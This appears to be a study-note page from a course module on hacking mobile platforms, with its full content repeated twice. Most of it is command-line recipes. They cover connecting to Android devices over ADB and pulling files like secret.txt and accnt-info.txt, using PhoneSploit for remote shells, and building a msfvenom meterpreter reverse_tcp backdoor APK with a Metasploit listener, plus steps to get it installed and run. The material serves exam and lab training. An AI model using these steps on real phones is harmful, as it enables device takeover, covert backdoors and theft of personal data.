17 - Hacking Mobile

Module 17 - Hacking Mobile Platforms

Download a file from Android device

ADB Tool

adb devices -l

# Connection Establish Steps
adb connect 192.168.0.4:5555
adb devices -l
adb shell  

# Download a File from Android using ADB tool
adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt 
adb pull sdcard/log.txt /home/mmurphy/Desktop

PhoneSploit

git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
#OR
python3 -m pip install colorama

python3 phonesploit.py

# Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
# Type 4, to Access Shell on phone

pwd
ls
cd sdcard
ls
cd Download

#Download File using PhoneSploit
9. Pull Folders from Phone to PC

#Enter the Full Path of file to Download
sdcard/Download/secret.txt

Check entropy and hash of elf file using ADB Tool

#Perform deep scan of the elf files and obtain the last 4 digits of SHA 384 hash of the file with highest entropy value

adb connect 192.168.0.4:5555 # Connection Establish Steps
adb shell  

#1. check elf file with highest entropy
ls sdcard/scan #check if there're .elf files
sudo adb pull /sdcard/scan #download entire dir including .elf files
ent -h #ent tool options, if we haven't it: apt install ent
ent first_file.elf #Entropy value 3.28412 bits, it has highest value of entropy.
ent second_file.elf #Entropy value 1.15679 bits

#2. check the last 4 digits of SHA 384
sha384sum --help
sha384sum first_file.elf
#select only the last 4 digits of hash.

Generating and Executing Payloads for Android

Setup Android

Open terminal, run su
Run ip addr add 10.10.10.69/24 dev eth0

Generate Payload

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk R raw
Host the payload and run a listener on Kali
Type use exploit/multi/handler
Type set payload android/meterpreter/reverse_tcp
Type set LHOST 10.10.10.11
Start listener, type exploit -j -z
Browse link of file to start meterpreter session.

Exploit Execution

Open kali hosted link.
Download APK using es file downloader.
Install and run.

Exploit the Android Platform through ADB using PhoneSploit

cd Phonesploit
python3 -m pip install colorama
python3 phonesploit.py
3
10.10.10.14
4
pwd
cd sdcard
cd Download
pwd
cd sdcard
cd downloads
cat accnt-info.txt

Previous16 - Hacking Wireless Next18 - IoT and OT Hacking

Last updated 1 year ago

Download a file from Android device

ADB Tool

adb devices -l

# Connection Establish Steps
adb connect 192.168.0.4:5555
adb devices -l
adb shell  

# Download a File from Android using ADB tool
adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt 
adb pull sdcard/log.txt /home/mmurphy/Desktop

PhoneSploit

git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
#OR
python3 -m pip install colorama

python3 phonesploit.py

# Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
# Type 4, to Access Shell on phone

pwd
ls
cd sdcard
ls
cd Download

#Download File using PhoneSploit
9. Pull Folders from Phone to PC

#Enter the Full Path of file to Download
sdcard/Download/secret.txt

Check entropy and hash of elf file using ADB Tool

#Perform deep scan of the elf files and obtain the last 4 digits of SHA 384 hash of the file with highest entropy value

adb connect 192.168.0.4:5555 # Connection Establish Steps
adb shell  

#1. check elf file with highest entropy
ls sdcard/scan #check if there're .elf files
sudo adb pull /sdcard/scan #download entire dir including .elf files
ent -h #ent tool options, if we haven't it: apt install ent
ent first_file.elf #Entropy value 3.28412 bits, it has highest value of entropy.
ent second_file.elf #Entropy value 1.15679 bits

#2. check the last 4 digits of SHA 384
sha384sum --help
sha384sum first_file.elf
#select only the last 4 digits of hash.

Generating and Executing Payloads for Android

Setup Android

Open terminal, run su

Run ip addr add 10.10.10.69/24 dev eth0

Generate Payload

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk R raw

Host the payload and run a listener on Kali

Type use exploit/multi/handler

Type set payload android/meterpreter/reverse_tcp

Type set LHOST 10.10.10.11

Start listener, type exploit -j -z

Browse link of file to start meterpreter session.

Exploit Execution

Open kali hosted link.

Download APK using es file downloader.

Install and run.